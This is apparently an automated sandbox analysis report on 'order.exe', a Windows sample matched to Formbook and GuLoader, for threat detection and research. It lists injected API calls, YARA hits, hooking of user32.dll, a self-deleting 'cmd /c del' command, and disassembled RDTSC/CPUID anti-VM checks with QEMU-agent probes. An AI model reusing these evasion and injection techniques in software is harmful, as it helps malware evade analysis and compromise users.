      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0513A770 NtOpenThread,19_2_0513A770
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139770 NtSetInformationFile,19_2_05139770
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139760 NtOpenProcess,19_2_05139760
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051397A0 NtUnmapViewOfSection,19_2_051397A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139610 NtEnumerateValueKey,19_2_05139610
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139670 NtQueryInformationProcess,19_2_05139670
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139950 NtQueueApcThread,19_2_05139950
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051399D0 NtCreateProcessEx,19_2_051399D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139820 NtEnumerateKey,19_2_05139820
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0513B040 NtSuspendThread,19_2_0513B040
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051398A0 NtWriteVirtualMemory,19_2_051398A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051398F0 NtReadVirtualMemory,19_2_051398F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139B00 NtSetValueKey,19_2_05139B00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0513A3B0 NtGetContextThread,19_2_0513A3B0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139A10 NtQuerySection,19_2_05139A10
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139A00 NtProtectVirtualMemory,19_2_05139A00
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139A20 NtResumeThread,19_2_05139A20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05139A80 NtOpenDirectoryObject,19_2_05139A80
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B9D40 NtCreateFile,19_2_007B9D40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B9DF0 NtReadFile,19_2_007B9DF0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B9E70 NtClose,19_2_007B9E70
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B9F20 NtAllocateVirtualMemory,19_2_007B9F20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B9D3B NtCreateFile,19_2_007B9D3B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B9DEA NtReadFile,19_2_007B9DEA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B9F1A NtAllocateVirtualMemory,19_2_007B9F1A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C6E3012_2_1E3C6E30
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46D61612_2_1E46D616
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E472EF712_2_1E472EF7
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E47DFCE12_2_1E47DFCE
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E471FF112_2_1E471FF1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46D46612_2_1E46D466
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3B841F12_2_1E3B841F
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E471D5512_2_1E471D55
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3A0D2012_2_1E3A0D20
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E472D0712_2_1E472D07
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4725DD12_2_1E4725DD
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D258112_2_1E3D2581
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BD5E012_2_1E3BD5E0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E45FA2B12_2_1E45FA2B
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4722AE12_2_1E4722AE
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E472B2812_2_1E472B28
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CAB4012_2_1E3CAB40
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3DEBB012_2_1E3DEBB0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46DBD212_2_1E46DBD2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4603DA12_2_1E4603DA
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3CA83012_2_1E3CA830
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E46100212_2_1E461002
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E47E82412_2_1E47E824
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3D20A012_2_1E3D20A0
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3BB09012_2_1E3BB090
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4728EC12_2_1E4728EC
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E4720A812_2_1E4720A8
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3C412012_2_1E3C4120
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3AF90012_2_1E3AF900
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0008106912_2_00081069
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0008986212_2_00089862
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0008107212_2_00081072
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00082CEC12_2_00082CEC
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00082CF212_2_00082CF2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0008813212_2_00088132
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0008AA3212_2_0008AA32
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00085B1F12_2_00085B1F
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00085B2212_2_00085B22
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000BE89C12_2_000BE89C
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000BD8B112_2_000BD8B1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000BE1F112_2_000BE1F1
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000A2D8A12_2_000A2D8A
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000A2D9012_2_000A2D90
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000A9E4012_2_000A9E40
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000BCF8312_2_000BCF83
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000A2FB012_2_000A2FB0
      Source: C:\Windows\explorer.exeCode function: 16_2_06D04A3216_2_06D04A32
      Source: C:\Windows\explorer.exeCode function: 16_2_06CFCCEC16_2_06CFCCEC
      Source: C:\Windows\explorer.exeCode function: 16_2_06CFCCF216_2_06CFCCF2
      Source: C:\Windows\explorer.exeCode function: 16_2_06CFB06916_2_06CFB069
      Source: C:\Windows\explorer.exeCode function: 16_2_06D0386216_2_06D03862
      Source: C:\Windows\explorer.exeCode function: 16_2_06CFB07216_2_06CFB072
      Source: C:\Windows\explorer.exeCode function: 16_2_06D07A6F16_2_06D07A6F
      Source: C:\Windows\explorer.exeCode function: 16_2_06CFFB1F16_2_06CFFB1F
      Source: C:\Windows\explorer.exeCode function: 16_2_06D07B0E16_2_06D07B0E
      Source: C:\Windows\explorer.exeCode function: 16_2_06D0213216_2_06D02132
      Source: C:\Windows\explorer.exeCode function: 16_2_06CFFB2216_2_06CFFB22
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C2D0719_2_051C2D07
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050F0D2019_2_050F0D20
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C1D5519_2_051C1D55
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512258119_2_05122581
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C25DD19_2_051C25DD
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510D5E019_2_0510D5E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510841F19_2_0510841F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BD46619_2_051BD466
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051CDFCE19_2_051CDFCE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C1FF119_2_051C1FF1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BD61619_2_051BD616
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_05116E3019_2_05116E30
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C2EF719_2_051C2EF7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_050FF90019_2_050FF900
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511412019_2_05114120
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051199BF19_2_051199BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B100219_2_051B1002
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511A83019_2_0511A830
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051CE82419_2_051CE824
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0510B09019_2_0510B090
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051220A019_2_051220A0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C20A819_2_051C20A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C28EC19_2_051C28EC
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C2B2819_2_051C2B28
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0511AB4019_2_0511AB40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0512EBB019_2_0512EBB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051B03DA19_2_051B03DA
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051BDBD219_2_051BDBD2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051AFA2B19_2_051AFA2B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_051C22AE19_2_051C22AE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007BD8B119_2_007BD8B1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007BE89C19_2_007BE89C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007BE1F119_2_007BE1F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007A2D9019_2_007A2D90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007A2D8A19_2_007A2D8A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007A9E4019_2_007A9E40
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007A2FB019_2_007A2FB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007BCF8319_2_007BCF83
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 050FB150 appears 72 times
      Source: C:\Users\user\Desktop\order.exeCode function: String function: 1E3AB150 appears 54 times
      Source: order.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: order.exe, 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePENGESEDLERS.exe vs order.exe
      Source: order.exe, 00000000.00000002.348138525.00000000021E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs order.exe
      Source: order.exe, 0000000C.00000002.420922926.000000001DDA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs order.exe
      Source: order.exe, 0000000C.00000002.420991234.000000001DEF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs order.exe
      Source: order.exe, 0000000C.00000000.346370402.0000000000415000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamePENGESEDLERS.exe vs order.exe
      Source: order.exe, 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs order.exe
      Source: order.exe, 0000000C.00000002.415954016.00000000000D6000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs order.exe
      Source: order.exeBinary or memory string: OriginalFilenamePENGESEDLERS.exe vs order.exe
      Source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000013.00000002.506645902.0000000004EC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000013.00000002.506407898.0000000004C35000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000013.00000002.505278996.00000000007A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000013.00000002.508528778.00000000055FF000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000013.00000002.506547005.0000000004E90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.421125890.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@7/0@1/1
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_01
      Source: order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\order.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
      Source: C:\Users\user\Desktop\order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\order.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\order.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: order.exeVirustotal: Detection: 22%
      Source: order.exeReversingLabs: Detection: 41%
      Source: unknownProcess created: C:\Users\user\Desktop\order.exe 'C:\Users\user\Desktop\order.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\order.exe 'C:\Users\user\Desktop\order.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\order.exeProcess created: C:\Users\user\Desktop\order.exe 'C:\Users\user\Desktop\order.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\order.exe'Jump to behavior
      Source: C:\Users\user\Desktop\order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
      Source: Binary string: chkdsk.pdbGCTL source: order.exe, 0000000C.00000002.415942202.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.403086058.000000000E6F0000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: order.exe, 0000000C.00000002.415942202.00000000000D0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: order.exe, 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, chkdsk.exe, 00000013.00000002.507166731.00000000050D0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: order.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.403086058.000000000E6F0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: Process Memory Space: order.exe PID: 6752, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: order.exe PID: 6008, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: order.exe PID: 6752, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: order.exe PID: 6008, type: MEMORY
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_00412675 push eax; ret 0_2_004126B4
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02287249 push FFFFFFB9h; retf 0_2_022872AB
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022872BF push FFFFFFB9h; retf 0_2_022872AB
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022872BF push FFFFFFB9h; retf 0_2_022872CA
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_022892B0 push dword ptr [edx]; ret 0_2_022892B7
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02286FAE push FFFFFFB9h; retf 0_2_02286FB9
      Source: C:\Users\user\Desktop\order.exeCode function: 0_2_02286FCD push FFFFFFB9h; retf 0_2_02286FD8
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_1E3FD0D1 push ecx; ret 12_2_1E3FD0E4
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_0008E3E6 pushad ; ret 12_2_0008E3E7
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000B60A4 push esp; ret 12_2_000B60A8
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000B79B8 push es; retf 12_2_000B79BF
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000B7AD6 push edi; iretd 12_2_000B7AD7
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000B63D0 push ecx; iretd 12_2_000B63D2
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000BCE95 push eax; ret 12_2_000BCEE8
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000BCEEB push eax; ret 12_2_000BCF52
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000BCEE2 push eax; ret 12_2_000BCEE8
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_000BCF4C push eax; ret 12_2_000BCF52
      Source: C:\Users\user\Desktop\order.exeCode function: 12_2_00567249 push FFFFFFB9h; retf 12_2_005672AB
      Source: C:\Windows\explorer.exeCode function: 16_2_06D083E6 pushad ; ret 16_2_06D083E7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_0514D0D1 push ecx; ret 19_2_0514D0E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B60A4 push esp; ret 19_2_007B60A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B79B8 push es; retf 19_2_007B79BF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B7AD6 push edi; iretd 19_2_007B7AD7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007B63D0 push ecx; iretd 19_2_007B63D2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007BCEEB push eax; ret 19_2_007BCF52
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007BCEE2 push eax; ret 19_2_007BCEE8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007BCE95 push eax; ret 19_2_007BCEE8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 19_2_007BCF4C push eax; ret 19_2_007BCF52

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x84 0x4E 0xED
      Source: C:\Users\user\Desktop\order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\order.exeRDTSC instruction interceptor: First address: 0000000002287CB9 second address: 0000000002287CB9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1FCF53148h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f pushad 0x00000020 mov bx, 04F4h 0x00000024 cmp bx, 04F4h 0x00000029 jne 00007FA1FCF4BD76h 0x0000002f popad 0x00000030 jmp 00007FA1FCF5316Ah 0x00000032 cmp bx, bx 0x00000035 cmp dh, ah 0x00000037 add edi, edx 0x00000039 dec dword ptr [ebp+000000F8h] 0x0000003f cmp dl, bl 0x00000041 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000048 jne 00007FA1FCF530E7h 0x0000004a test dl, al 0x0000004c nop 0x0000004d call 00007FA1FCF531DDh 0x00000052 call 00007FA1FCF5315Ah 0x00000057 lfence 0x0000005a mov edx, dword ptr [7FFE0014h] 0x00000060 lfence 0x00000063 ret 0x00000064 mov esi, edx 0x00000066 pushad 0x00000067 rdtsc
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\order.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\order.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\order.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\order.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: order.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\order.exeRDTSC instruction interceptor: First address: 0000000002287CB9 second address: 0000000002287CB9 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FA1FCF53148h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f pushad 0x00000020 mov bx, 04F4h 0x00000024 cmp bx, 04F4h 0x00000029 jne 00007FA1FCF4BD76h 0x0000002f popad 0x00000030 jmp 00007FA1FCF5316Ah 0x00000032 cmp bx, bx 0x00000035 cmp dh, ah 0x00000037 add edi, edx 0x00000039 dec dword ptr [ebp+000000F8h] 0x0000003f cmp dl, bl 0x00000041 cmp dword ptr [ebp+000000F8h], 00000000h 0x00000048 jne 00007FA1FCF530E7h 0x0000004a test dl, al 0x0000004c nop 0x0000004d call 00007FA1FCF531DDh 0x00000052 call 00007FA1FCF5315Ah 0x00000057 lfence 0x0000005a mov edx, dword ptr [7FFE0014h] 0x00000060 lfence 0x00000063 ret 0x00000064 mov esi, edx 0x00000066 pushad 0x00000067 rdtsc
      Source: C:\Users\user\Desktop\order.exeRDTSC instruction interceptor: First address: 0000000002287CDB second address: 0000000002287CDB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1FCD29D0Ch 0x0000001f popad 0x00000020 call 00007FA1FCD29718h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\order.exeRDTSC instruction interceptor: First address: 0000000000567CDB second address: 0000000000567CDB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1FCF538ACh 0x0000001f popad 0x00000020 call 00007FA1FCF532B8h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\order.exeRDTSC instruction interceptor: First address: 0000000000567689 second address: 0000000000567689 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov eax, dword ptr [ebp+64h] 0x00000006 test ch, bh 0x00000008 mov bx, word ptr [edx+00010040h] 0x0000000f cmp al, 0Bh 0x00000011 mov ax, word ptr [eax] 0x00000014 xor ax, cx 0x00000017 xor bx, ax 0x0000001a cmp esi, 54674AF8h 0x00000020 cmp bx, 5A4Dh 0x00000025 je 00007FA1FCD295D4h 0x00000027 jmp 00007FA1FCD295C6h 0x00000029 test ch, FFFFFFA5h 0x0000002c inc cx 0x0000002e jmp 00007FA1FCD29548h 0x00000030 pushad 0x00000031 mov edx, 000000D4h 0x00000036 rdtsc
      Source: C:\Users\user\Desktop\order.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
